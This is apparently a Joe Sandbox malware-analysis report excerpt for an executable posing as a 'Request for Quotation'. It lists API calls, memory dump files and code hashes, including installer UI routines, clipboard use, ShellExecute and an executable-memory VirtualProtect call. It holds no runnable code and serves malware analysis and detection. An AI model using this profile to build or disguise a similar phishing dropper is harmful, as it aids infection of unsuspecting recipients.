                                                                                                                                  • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                                                  APIs
                                                                                                                                  • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PathSearch
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2203818243-0
                                                                                                                                  • Opcode ID: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                                                  • Instruction ID: f28d117729d6db308ba67ea043928a1e47cb3974c8f3bd2f87491376c6cbdc89
                                                                                                                                  • Opcode Fuzzy Hash: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                                                  • Instruction Fuzzy Hash: 73E048B2314200AAD710DFA5DE48EEA776CDB0036CF304676E611A61D0D2B45A41D72D
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,000001FA,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                  • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                                                  • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                                  • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                  • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                                                  • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                                  • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                                                  APIs
                                                                                                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                  • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                  • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                  • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                                                  • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                  • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                                                  • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                                  • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocGlobal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761449716-0
                                                                                                                                  • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                  • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                  • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                  • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                    • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                                  • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                                  • CloseClipboard.USER32 ref: 00405658
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {
                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                  • Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                  • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                                  • Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                                  • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                                  • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 0040473D
                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                    • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061E1
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                    • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 004061F5
                                                                                                                                    • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00406208
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                                                                  • API String ID: 2246997448-3461569884
                                                                                                                                  • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                  • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                                  • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                                  • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                  • Opcode ID: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                                                  • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
                                                                                                                                  • Opcode Fuzzy Hash: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                                                  • Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040437E
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                                                  • GetSysColor.USER32(?), ref: 004043AC
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004043CD
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404448
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040444F
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040447A
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044CE
                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
